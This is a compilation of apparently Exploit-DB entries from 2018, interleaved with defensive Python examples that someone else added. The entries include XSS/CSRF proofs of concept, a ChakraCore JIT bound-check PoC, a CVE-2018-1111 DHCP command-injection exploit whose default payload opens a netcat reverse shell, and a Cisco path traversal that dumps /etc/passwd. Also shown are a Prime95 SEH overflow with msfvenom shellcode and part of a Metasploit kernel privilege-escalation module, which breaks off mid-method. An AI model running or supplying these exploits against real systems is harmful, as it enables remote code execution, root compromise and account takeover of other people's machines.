For Xbox-SystemOS version: 10.0.14393.2152 (rs1_xbox_rel_1610 161208-1218) fre, 12/14/2016
Other versions will most likely need modifications to the script.
**Credits**:
- https://github.com/theori-io/chakra-2016-11
- https://bugs.chromium.org/p/project-zero/issues/detail?id=952
- https://bugs.chromium.org/p/project-zero/issues/detail?id=945
**Info**:
It is not sufficient to start an .exe via shellcode ;)
Exploiters, be creative!
It would be desirable to find a way to invoke the Edge engine while the console is offline.
Greets from unknownv2 & mon0 _
Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44644.zip
# Exploit Title: Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery
# Date: 2018-05-17
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/healwire-online-pharmacy/16423338?s_rank=1499
# Version: 3.0
# Tested on: windows
# POC 1 : Cross-site scripting :
1) Create an account and go to your profile.
2) When you try to put "<script></script>" into the fields, the word "script" is
replaced with nothing (null), so this filter can be bypassed by using
JavaScript event handlers such as "onmouseover" or "oninput".
Put one of these payloads into the fields :
1 - " oninput=alert('xss') "
2 - " onmouseover=alert('xss') "
3) You will get an alert box inside the page (after typing something into
the fields or moving the mouse over the fields).
# POC 2 : Cross-site request forgery :
# With a CSRF vulnerability, an attacker can easily change a user's information.
# This script uses an anti-CSRF token, so a user's information can't be changed
# without the token.
# However, there is a vulnerable parameter with reflected XSS on another page
# of this script:
# http://store.webandcrafts.com/demo/healwire/?msg= [We have Reflected XSS here]
# The anti-CSRF token can now be bypassed through this parameter using JavaScript:
# Exploit :
"/><form action="
http://store.webandcrafts.com/demo/healwire/user/update-details-user/1"
method="POST">
<input type="hidden" name="first_name" value="a" />
<input type="hidden" name="address"
value="" oninput=alert(document.domain) ""
/>
<input type="hidden" name="pincode" value="a" />
<input type="hidden" name="phone" value="100000000" />
<input type="hidden" name="last_name" value="anything" />
<input type="hidden" name="_token" value="" />
</form>
<script>
var token = ' ';
var req = new XMLHttpRequest();
req.onreadystatechange = function(){
if(this.readyState == 4 && this.status == 200){
var secPage = this.responseXML;
token = secPage.forms[0].elements[0].value;
console.log(token);
}
}
req.open("GET","/demo/healwire/account-page",true);
req.responseType = "document";
req.send();
window.setTimeout(function(){
document.forms[0].elements[5].value = token;
document.forms[0].submit();
},3000)
</script>
# You can also send two AJAX requests instead of using a form.
# Encode this payload and put it into the "msg" parameter.
# JSON result after 3 seconds :
status "SUCCESS"
msg "User profile updated !"
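Both PoCs above turn on the same defect: the application tries to sanitise input by deleting the word "script" and otherwise writes the raw value back into an HTML attribute, so any string that closes the quote and adds an event handler executes. The block below is an added example (it is not from the advisory or the Healwire code) that runs the two payloads through a reconstruction of that keyword filter and through contextual output escaping, then uses Python's own HTML parser to see which attributes actually end up on the tag. The field name and markup are constructed for the example.

```python
import html
import re
from html.parser import HTMLParser

# Constructed inputs modelled on the PoCs above: the event-handler strings
# that survive a "strip the word script" filter, and a plain <script> tag.
PAYLOADS = [
    "\" oninput=alert('xss') \"",
    "\" onmouseover=alert('xss') \"",
    "<script>alert('xss')</script>",
]


def blacklist_filter(value: str) -> str:
    """The filter the advisory describes: the word "script" is dropped, nothing else."""
    return re.sub(r"script", "", value, flags=re.IGNORECASE)


def render_unsafe(value: str) -> str:
    """Vulnerable pattern: the blacklist-filtered value is spliced into an attribute."""
    return f'<input type="text" name="address" value="{blacklist_filter(value)}">'


def render_safe(value: str) -> str:
    """Hardened pattern: contextual output encoding. html.escape(quote=True) turns
    the quote characters into &quot;/&#x27;, so the value cannot close the attribute."""
    return f'<input type="text" name="address" value="{html.escape(value, quote=True)}">'


class _InputAttrs(HTMLParser):
    """Collects the attributes a browser-side parser would see on the <input> tag."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs.update(dict(attrs))


def injected_handlers(markup: str) -> list:
    """Event-handler attributes that ended up on the tag, i.e. a successful breakout."""
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return sorted(name for name in parser.attrs if name.startswith("on"))


if __name__ == "__main__":
    for payload in PAYLOADS:
        print(f"{payload!r}: unsafe -> {injected_handlers(render_unsafe(payload))}, "
              f"safe -> {injected_handlers(render_safe(payload))}")
```

The same escaping applies to the reflected "msg" parameter used in POC 2: an attribute or text node that is escaped on output cannot host the token-stealing script, which is what makes the anti-CSRF token hold.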
/*
Chakra uses the InvariantBlockBackwardIterator class to back-propagate information about hoisted bound checks. But the class follows the linked list of blocks instead of the control flow, which may lead to bound checks being incorrectly removed.
In the following code, currentBlock's block number is 4 and hoistBlock's block number is 1 (please see the IR code). I assume it should visit 4 -> 3 (skipped) -> 1 (break) in order, following the control flow, but it actually visits 4 -> 3 (skipped) -> 2 -> 1 (break). This gives block 2 wrong information about the bounds, which in turn causes the bound checks in block 5 to be removed.
https://github.com/Microsoft/ChakraCore/blob/48c73e51c3e0fb36a08fa844cdb88c9d8a54de32/lib/Backend/GlobOpt.cpp#L14667
if(hoistBlock != currentBlock)
{
for(InvariantBlockBackwardIterator it(this, currentBlock->next, hoistBlock, nullptr);
it.IsValid();
it.MoveNext())
{
BasicBlock *const block = it.Block();
...
PoC:
*/
function opt(arr, idx) {
((arr.length === 0x7ffffff0 && arr[0x7ffffff0]) || false) && (arr.length === 0x7ffffff0 && arr[0x7ffffff1]) || (arr[0x11111111] = 0x1234);
}
function main() {
let arr = new Uint32Array(1);
for (let i = 0; i < 10000; i++) {
opt(arr);
}
}
main();
/*
Here's the IR code for the PoC:
FunctionEntry #
---------
BLOCK 0: Out(1, 2)
$L8: #
s1[Object].var = Ld_A 0xXXXXXXXX (GlobalObject)[Object].var #
s21(s2)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 2147483632 (0x7FFFFFF0)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #
s3[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #
s22(s4)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 2147483633 (0x7FFFFFF1)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #
s23(s5)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 286331153 (0x11111111)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #
s24(s6)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 4660 (0x1234)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #
s7[LikelyCanBeTaggedValue_Uint32Array].var = ArgIn_A prm2<40>[LikelyCanBeTaggedValue_Uint32Array].var! #
s8[LikelyUndefined_CanBeTaggedValue].var = ArgIn_A prm3<48>[LikelyUndefined_CanBeTaggedValue].var! #
Line 2: arr.length === 0x7ffffff0 && arr[0x7ffffff0]) || false) && (arr.length === 0x7ffffff0 && arr[0x7ffffff1]) || (arr[0x11111111] = 0x1234);
Col 7: ^
StatementBoundary #0 #0000
BailOnNotArray s7[LikelyCanBeTaggedValue_Uint32Array].var #0000 Bailout: #0000 (BailOutOnNotArray)
s25.u32 = LdIndir [s7[Uint32Array].var+32].u32 #0000
NoImplicitCallUses s25.u32 #0000
ByteCodeUses s7 #0000
s26(s10)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 s25.u32 #0000
s15[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #0004
s9[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #0004
ByteCodeUses s10 #0004
BrNeq_I4 $L4, s26(s10)[CanBeTaggedValue_Int_IntCanBeUntagged].i32!, 2147483632 (0x7FFFFFF0).i32 #0004
---------
BLOCK 1: In(0) Out(2, 3)
$L7: #0008
s15[Boolean].var = Ld_A 0xXXXXXXXX (true)[Boolean].var #0008
s9[Boolean].var = Ld_A 0xXXXXXXXX (true)[Boolean].var #0008
BoundCheck 2147483633 < s25.u32 #000f Bailout: #000f (BailOutOnFailedHoistedBoundCheck)
s27.u64 = LdIndir [s7[Uint32Array].var+56].u64 #000f
NoImplicitCallUses s25.u32 #000f
s28(s16)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = LdElemI_A [s7[Uint32Array][seg: s27][segLen: s25][><].var+2147483632].var #000f Bailout: #000f (BailOutConventionalTypedArrayAccessOnly)
ByteCodeUses s16 #0015
s29(s9)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 s28(s16)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0015
s9[CanBeTaggedValue_Int].var = ToVar s29(s9)[CanBeTaggedValue_Int].i32 #0018
ByteCodeUses s16 #0018
BrTrue_I4 $L3, s28(s16)[CanBeTaggedValue_Int_IntCanBeUntagged].i32! #0018
---------
BLOCK 2: In(0, 1) Out(5)
$L4: #001c
s9[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #001c
Br $L2 #001e
---------
BLOCK 3: In(1) Out(4) DeadOut(5)
$L3: #0021
NoImplicitCallUses s25.u32 #0021
ByteCodeUses s7 #0021
s30(s17)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 s25.u32 #0021
s18[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #0025
s9[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #0025
ByteCodeUses s17 #0025
---------
BLOCK 4: In(3) Out(8, 5)
$L6: #0029
s18[Boolean].var = Ld_A 0xXXXXXXXX (true)[Boolean].var #0029
s9[Boolean].var = Ld_A 0xXXXXXXXX (true)[Boolean].var #0029
NoImplicitCallUses s25.u32 #0030
s31(s19)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = LdElemI_A [s7[Uint32Array][seg: s27][segLen: s25][><].var+2147483633].var #0030 Bailout: #0030 (BailOutConventionalTypedArrayAccessOnly)
ByteCodeUses s19 #0036
s29(s9)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 s31(s19)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0036
s9[CanBeTaggedValue_Int].var = ToVar s29(s9)[CanBeTaggedValue_Int].i32 #0039
ByteCodeUses s19 #0039
BrTrue_I4 $L9, s31(s19)[CanBeTaggedValue_Int_IntCanBeUntagged].i32! #0039
---------
BLOCK 5: In(2, 4) Out(6) DeadIn(3)
$L2: #003d
s32.u64 = LdIndir [s7[Uint32Array].var+56].u64 #003d
NoImplicitCallUses s25.u32 #003d
[s7[Uint32Array][seg: s32][segLen: s25][><].var+286331153].var = StElemI_A 4660 (0x1234).i32 #003d Bailout: #003d (BailOutConventionalTypedArrayAccessOnly)
s33(s20)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 4660 (0x1234)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0043
ByteCodeUses s20 #0046
s29(s9)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 4660 (0x1234)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0046
s34.u64 = Ld_A s32.u64 #004b
Br $L1 #004b
---------
BLOCK 8: **** Air lock Block **** In(4) Out(6)
$L9: #004b
s34.u64 = Ld_A s27.u64 #004b
Br $L1 #004b
---------
BLOCK 6: In(8, 5) Out(7)
$L1: #004b
s0[Undefined].var = Ld_A 0xXXXXXXXX (undefined)[Undefined].var #004b
Line 3: }
Col 1: ^
StatementBoundary #1 #004d
StatementBoundary #-1 #004d
Ret s0[Undefined].var! #004d
---------
BLOCK 7: In(6)
$L5: #
----------------------------------------------------------------------------------------
*/
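The report's point is the difference between walking blocks in layout order (the prev/next linked list) and walking the predecessor edges of the control-flow graph. The block below is an added example, not part of the bug report or of ChakraCore: it encodes the In/Out edges and the block order from the IR dump above and computes both walks from block 4 back to block 1. It does not model why block 3 is skipped by the real iterator; it only shows that block 2 is reached by the layout walk while lying on no path from hoistBlock to currentBlock, which is exactly the block that receives stale bounds information.

```python
from collections import deque

# Constructed from the IR dump above: successor lists and the layout order in which
# the blocks are chained by their next/prev pointers.
SUCCESSORS = {0: [1, 2], 1: [2, 3], 2: [5], 3: [4], 4: [8, 5], 5: [6], 8: [6], 6: [7], 7: []}
LAYOUT_ORDER = [0, 1, 2, 3, 4, 5, 8, 6, 7]

PREDECESSORS = {block: [] for block in SUCCESSORS}
for src, dsts in SUCCESSORS.items():
    for dst in dsts:
        PREDECESSORS[dst].append(src)


def linked_list_backward(current: int, hoist: int) -> list:
    """Follow prev pointers from `current` down to `hoist` inclusive (what the
    iterator does when it ignores control flow)."""
    start, stop = LAYOUT_ORDER.index(current), LAYOUT_ORDER.index(hoist)
    return LAYOUT_ORDER[stop:start + 1][::-1]


def reachable_from(start: int) -> set:
    """Blocks reachable from `start` along successor edges."""
    seen, work = set(), [start]
    while work:
        block = work.pop()
        if block in seen:
            continue
        seen.add(block)
        work.extend(SUCCESSORS[block])
    return seen


def control_flow_backward(current: int, hoist: int) -> list:
    """Breadth-first walk over predecessor edges from `current`, never expanding past
    `hoist`, keeping only blocks that `hoist` can reach: the blocks on some
    hoist -> current path, which are the only ones the hoisted check dominates."""
    forward = reachable_from(hoist)
    order, seen, work = [], {current}, deque([current])
    while work:
        block = work.popleft()
        if block not in forward:
            continue
        order.append(block)
        if block == hoist:
            continue
        for pred in PREDECESSORS[block]:
            if pred not in seen:
                seen.add(pred)
                work.append(pred)
    return order


def spuriously_visited(current: int, hoist: int) -> list:
    """Blocks the layout walk touches that are not on any hoist -> current path."""
    return sorted(set(linked_list_backward(current, hoist)) - set(control_flow_backward(current, hoist)))


if __name__ == "__main__":
    print("layout order  :", linked_list_backward(4, 1))
    print("control flow  :", control_flow_backward(4, 1))
    print("wrongly visited:", spuriously_visited(4, 1))
```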
# Exploit Title: DynoRoot DHCP - Client Command Injection
# Date: 2018-05-18
# Exploit Author: Kevin Kirsche
# Exploit Repository: https://github.com/kkirsche/CVE-2018-1111
# Exploit Discoverer: Felix Wilhelm
# Vendor Homepage: https://www.redhat.com/
# Version: RHEL 6.x / 7.x and CentOS 6.x/7.x
# Tested on: CentOS Linux release 7.4.1708 (Core) / NetworkManager 1.8.0-11.el7_4
# CVE : CVE-2018-1111
#!/usr/bin/env python
from argparse import ArgumentParser
from scapy.all import BOOTP_am, DHCP
from scapy.base_classes import Net


class DynoRoot(BOOTP_am):
    function_name = "dhcpd"

    def make_reply(self, req):
        resp = BOOTP_am.make_reply(self, req)
        if DHCP in req:
            dhcp_options = [(op[0], {1: 2, 3: 5}.get(op[1], op[1]))
                            for op in req[DHCP].options
                            if isinstance(op, tuple) and op[0] == "message-type"]
            dhcp_options += [("server_id", self.gw),
                             ("domain", self.domain),
                             ("router", self.gw),
                             ("name_server", self.gw),
                             ("broadcast_address", self.broadcast),
                             ("subnet_mask", self.netmask),
                             ("renewal_time", self.renewal_time),
                             ("lease_time", self.lease_time),
                             (252, "x'&{payload} #".format(payload=self.payload)),
                             "end"
                             ]
            resp /= DHCP(options=dhcp_options)
        return resp


if __name__ == '__main__':
    parser = ArgumentParser(description='CVE-2018-1111 DynoRoot exploit')
    parser.add_argument('-i', '--interface', default='eth0', type=str,
                        dest='interface',
                        help='The interface to listen for DHCP requests on (default: eth0)')
    parser.add_argument('-s', '--subnet', default='192.168.41.0/24', type=str,
                        dest='subnet', help='The network to assign via DHCP (default: 192.168.41.0/24)')
    parser.add_argument('-g', '--gateway', default='192.168.41.254', type=str,
                        dest='gateway', help='The network gateway to respond with (default: 192.168.41.254)')
    parser.add_argument('-d', '--domain', default='victim.net', type=str,
                        dest='domain', help='Domain to assign (default: victim.net)')
    parser.add_argument('-p', '--payload', default='nc -e /bin/bash 192.168.41.2 1337', type=str,
                        dest='payload', help='The payload / command to inject (default: nc -e /bin/bash 192.168.41.2 1337)')
    args = parser.parse_args()
    server = DynoRoot(iface=args.interface, domain=args.domain,
                      pool=Net(args.subnet),
                      network=args.subnet,
                      gw=args.gateway,
                      renewal_time=600, lease_time=3600)
    server.payload = args.payload
    server()
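The exploit above works because a DHCP option that should only ever be a string (option 252, the WPAD/proxy option) is handed to a shell unescaped, so a value of the form x'&command # terminates the quoting and runs the command. The block below is an added example written from the defender's side; it is neither the exploit's code nor NetworkManager's script. It parses the option area of a DHCP message, flags string-typed options that carry shell metacharacters (a rogue-server indicator worth alerting on), and contrasts a naive single-quoted export, which is a simplified stand-in for the unsafe pattern and an assumption about the real script, with shlex.quote. The sample offer is constructed and its 252 value is harmless.

```python
import re
import shlex

# Option codes used below: 53 = DHCP message type, 15 = domain name,
# 252 = the de facto WPAD/proxy-autoconfig option, 0 = pad, 255 = end.
OPT_MESSAGE_TYPE, OPT_DOMAIN, OPT_WPAD, OPT_PAD, OPT_END = 53, 15, 252, 0, 255
# Characters that have no business in a string-typed DHCP option value.
SHELL_META = re.compile(r"[;&|`$'\"\\\n<>(){}]")


def parse_dhcp_options(raw: bytes) -> dict:
    """Parse the option area of a DHCP message (everything after the magic cookie)
    into {code: value}. Truncated TLVs are rejected rather than silently dropped."""
    options, i = {}, 0
    while i < len(raw):
        code = raw[i]
        if code == OPT_PAD:
            i += 1
            continue
        if code == OPT_END:
            break
        if i + 1 >= len(raw):
            raise ValueError("truncated option header")
        length = raw[i + 1]
        value = raw[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option value")
        options[code] = value
        i += 2 + length
    return options


def is_well_formed(raw: bytes) -> bool:
    try:
        parse_dhcp_options(raw)
        return True
    except ValueError:
        return False


def suspicious_options(options: dict) -> list:
    """Codes of string-typed options carrying shell metacharacters: a DHCP server
    offering such values deserves an alert before any client script touches them."""
    return sorted(code for code, value in options.items()
                  if code in (OPT_DOMAIN, OPT_WPAD)
                  and SHELL_META.search(value.decode("latin-1")))


def unsafe_export(name: str, value: str) -> str:
    """Simplified stand-in (an assumption, not the real client script) for handing an
    option value to the shell by wrapping it in single quotes with no escaping."""
    return f"export {name}='{value}'"


def safe_export(name: str, value: str) -> str:
    """shlex.quote makes the value a single shell word whatever it contains."""
    return f"export {name}={shlex.quote(value)}"


def shell_words(line: str) -> list:
    """How a POSIX shell would tokenise the line (raises on unbalanced quotes)."""
    return shlex.split(line)


# Constructed sample offer: message type 2 (DHCPOFFER), a benign domain and a
# hostile 252 value shaped like the x'&...# pattern but harmless.
HOSTILE_WPAD = b"x'&echo injected #"
SAMPLE_OPTIONS = (
    bytes([OPT_MESSAGE_TYPE, 1, 2])
    + bytes([OPT_DOMAIN, 9]) + b"lab.local"
    + bytes([OPT_WPAD, len(HOSTILE_WPAD)]) + HOSTILE_WPAD
    + bytes([OPT_END])
)

if __name__ == "__main__":
    opts = parse_dhcp_options(SAMPLE_OPTIONS)
    print("suspicious option codes:", suspicious_options(opts))
    wpad = opts[OPT_WPAD].decode("latin-1")
    print("unsafe:", unsafe_export("new_wpad", wpad))
    print("safe:  ", safe_export("new_wpad", wpad))
```

In the unsafe form the value's own apostrophe closes the quote and everything after the ampersand becomes a second command; in the safe form the whole value survives as one word, which is the only property a script that consumes DHCP data needs to guarantee.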
# Exploit Title: Infinity Market Classified Ads Script 1.6.2 - Cross-Site Request Forgery
# Date: 2018-05-18
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/classifieds-multipurpose-portal-infinity-market/16572285?s_rank=1520
# Version: 1.6.2
# Tested on: Kali linux
# Description : A CSRF vulnerability allows an attacker to change a user's information directly.
# POC :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://geniuscript.com/classified/index.php/frontend/myprofile/en" method="POST">
<input type="hidden" name="name_surname" value="decode" />
<input type="hidden" name="username" value="user" />
<input type="hidden" name="password" value="anything" />
<input type="hidden" name="password_confirm" value="anything" />
<input type="hidden" name="address" value="Cyro trento 23" />
<input type="hidden" name="description" value="My description 2" />
<input type="hidden" name="phone" value="+10000000" />
<input type="hidden" name="mail" value="sanljiljan@geniuscript.com" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Title: Cisco SA520W Security Appliance - Path Traversal
# Author: Nassim Asrir
# Contact: wassline@gmail.com / https://www.linkedin.com/in/nassim-asrir-b73a57122/
# Vendor: https://www.cisco.com/
# About Product:
===============
Cisco SA 500 Series Security Appliances are designed for businesses with fewer than 100 employees.
They combine firewall, VPN, and optional intrusion prevention system (IPS), email, and web security capabilities. Whether in the office or working remotely, your employees can securely access the resources they need, while your business is protected from unauthorized access and Internet threats.
# POC
====================
// In this PoC we read /etc/passwd
Vulnerable parameter: thispage
payload: ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00index.htm
Request Type: POST
Request:
=======
POST /scgi-bin/platform.cgi HTTP/1.1
Host: host-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://70.186.255.169/scgi-bin/platform.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 311
Connection: close
Upgrade-Insecure-Requests: 1
thispage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00index.htm&SSLVPNUser.UserName=admin&SSLVPNUser.Password=admin&button.login.routerStatus=Log+In&Login.userAgent=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A58.0%29+Gecko%2F20100101+Firefox%2F58.0
Response:
========
HTTP/1.0 200 OK
Date: Sat, 01 Jan 2000 00:00:41 GMT
Server: Embedded HTTP Server.
Connection: close
root:$1$omdZQoH8$bFOOjhl.E7BKKzvW/bRJe0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
#Timeline:
=========
18 Apr 2018 : First contact with Cisco.
18 Apr 2018 : Cisco asked me for more details about the vulnerability.
18 Apr 2018 : Details sent to Cisco.
19 Apr 2018 : Asked for an update.
15 May 2018 : Cisco said: "The product you reference went end of support in April 2016. No further action will be taken."
18 May 2018 : Public disclosure.
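The traversal above combines sixteen encoded "../" segments with a trailing NUL byte so that a suffix check for "index.htm" passes while the file actually opened is /etc/passwd. The block below is an added example, not the appliance's code: a page-name resolver that decodes the parameter exactly once, rejects embedded NUL bytes, normalises the joined path lexically and then requires the result to remain inside an assumed web root. Applied to the advisory's payload and a few constructed variants, it shows which inputs are refused and why.

```python
import posixpath
from pathlib import PurePosixPath
from urllib.parse import unquote

# Assumed document root for this example; the real appliance's layout is unknown.
WEBROOT = PurePosixPath("/var/www/html")


class RejectedPath(ValueError):
    """Raised when a page parameter must not be served."""


def resolve_page(param: str, webroot: PurePosixPath = WEBROOT) -> PurePosixPath:
    """Map a user-supplied page name to a path under the web root, or raise.

    Decodes percent-encoding exactly once, refuses embedded NUL bytes (the
    "%00index.htm" trick that satisfies an extension check), normalises the
    joined path lexically and finally requires it to stay inside the root."""
    decoded = unquote(param)
    if "\x00" in decoded:
        raise RejectedPath("NUL byte in page parameter")
    # PurePosixPath.__truediv__ replaces the root when the right side is absolute,
    # so "/etc/passwd" is caught by the containment check below.
    joined = str(webroot / decoded)
    candidate = PurePosixPath(posixpath.normpath(joined))
    if candidate != webroot and webroot not in candidate.parents:
        raise RejectedPath("path escapes the web root")
    return candidate


def classify(param: str) -> str:
    """'ok:<path>' or 'rejected:<reason>', convenient for log lines and tests."""
    try:
        return f"ok:{resolve_page(param)}"
    except RejectedPath as exc:
        return f"rejected:{exc}"


# Constructed inputs: the advisory's payload, a NUL-free variant, an absolute
# path, and two ordinary page names.
SAMPLES = [
    "..%2f" * 16 + "etc%2fpasswd%00index.htm",
    "..%2f" * 16 + "etc%2fpasswd",
    "%2fetc%2fpasswd",
    "index.htm",
    "help/../index.htm",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample[:40]:40} -> {classify(sample)}")
```

Decoding once matters: a double-encoded "%252e%252e%2f" decodes to the literal file name "%2e%2e", which is then a harmless (non-existent) entry under the root rather than a second chance at traversal.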
# Exploit Title: Prime95 Local Buffer Overflow (SEH)
# Date: 13-4-2018
# Exploit Author: crash_manucoot
# Contact: twitter.com/crash_manucoot
# Vendor Homepage: https://www.mersenne.org/
# Software Link: https://www.mersenne.org/download/#download
# Version: 29.4b8
# Tested on: Windows 10 Pro x64 SPANISH Windows 7 Home Premium x86 SPANISH Windows XP SP3 SPANISH
# Category: Windows Local Exploit
# How to use: open the program, go to Test > PrimeNet, tick the checkbox, then go to Connections, paste the contents of open.txt into the optional proxy hostname field, and the calculator will open
buffer = "A" * 660
nseh = "\xeb\x06\x90\x90"
seh = "\x6B\xB0\xED\x6A" #pop esi # pop ebx # ret | {PAGE_EXECUTE_READ} [libgmp-10.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0
nop = "\x90" * 16
#msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python -v shellcode
shellcode = ""
shellcode += "\xbf\xc6\xde\x94\x3e\xda\xd0\xd9\x74\x24\xf4\x5d"
shellcode += "\x31\xc9\xb1\x31\x31\x7d\x13\x03\x7d\x13\x83\xc5"
shellcode += "\xc2\x3c\x61\xc2\x22\x42\x8a\x3b\xb2\x23\x02\xde"
shellcode += "\x83\x63\x70\xaa\xb3\x53\xf2\xfe\x3f\x1f\x56\xeb"
shellcode += "\xb4\x6d\x7f\x1c\x7d\xdb\x59\x13\x7e\x70\x99\x32"
shellcode += "\xfc\x8b\xce\x94\x3d\x44\x03\xd4\x7a\xb9\xee\x84"
shellcode += "\xd3\xb5\x5d\x39\x50\x83\x5d\xb2\x2a\x05\xe6\x27"
shellcode += "\xfa\x24\xc7\xf9\x71\x7f\xc7\xf8\x56\x0b\x4e\xe3"
shellcode += "\xbb\x36\x18\x98\x0f\xcc\x9b\x48\x5e\x2d\x37\xb5"
shellcode += "\x6f\xdc\x49\xf1\x57\x3f\x3c\x0b\xa4\xc2\x47\xc8"
shellcode += "\xd7\x18\xcd\xcb\x7f\xea\x75\x30\x7e\x3f\xe3\xb3"
shellcode += "\x8c\xf4\x67\x9b\x90\x0b\xab\x97\xac\x80\x4a\x78"
shellcode += "\x25\xd2\x68\x5c\x6e\x80\x11\xc5\xca\x67\x2d\x15"
shellcode += "\xb5\xd8\x8b\x5d\x5b\x0c\xa6\x3f\x31\xd3\x34\x3a"
shellcode += "\x77\xd3\x46\x45\x27\xbc\x77\xce\xa8\xbb\x87\x05"
shellcode += "\x8d\x34\xc2\x04\xa7\xdc\x8b\xdc\xfa\x80\x2b\x0b"
shellcode += "\x38\xbd\xaf\xbe\xc0\x3a\xaf\xca\xc5\x07\x77\x26"
shellcode += "\xb7\x18\x12\x48\x64\x18\x37\x2b\xeb\x8a\xdb\x82"
shellcode += "\x8e\x2a\x79\xdb"
evil = buffer + nseh + seh + nop + shellcode
file = open('open.txt','w+')
file.write(evil)
file.close()
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Post::Linux::Kernel
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'AF_PACKET packet_set_ring Privilege Escalation',
'Description' => %q{
This module exploits a heap-out-of-bounds write in the packet_set_ring
function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel
to execute code as root (CVE-2017-7308).
The bug was initially introduced in 2011 and patched in version 4.10.6,
potentially affecting a large number of kernels; however this exploit
targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46,
including Linux distros based on Ubuntu Xenial, such as Linux Mint.
The target system must have unprivileged user namespaces enabled and
two or more CPU cores.
Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation
may crash the kernel.
This module has been tested successfully on Linux Mint 18 (x86_64)
with kernel versions:
4.8.0-34-generic;
4.8.0-36-generic;
4.8.0-39-generic;
4.8.0-41-generic;
4.8.0-42-generic;
4.8.0-44-generic;
4.8.0-45-generic.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Andrey Konovalov', # Discovery and C exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Mar 29 2017',
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' =>
[
[ 'EDB', '41994' ],
[ 'CVE', '2017-7308' ],
[ 'BID', '97234' ],
[ 'URL', 'https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html' ],
[ 'URL', 'https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308' ],
[ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7308.html', ],
[ 'URL', 'https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c' ],
[ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/cve-2017-7308/CVE-2017-7308/poc.c' ]
],
'DefaultTarget' => 0))
register_options [
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
]
end
def base_dir
datastore['WritableDir'].to_s
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
write_file path, data
end
def upload_and_chmodx(path, data)
upload path, data
cmd_exec "chmod +x '#{path}'"
end
def upload_and_compile(path, data)
upload "#{path}.c", data
gcc_cmd = "gcc -o #{path} #{path}.c"
if session.type.eql? 'shell'
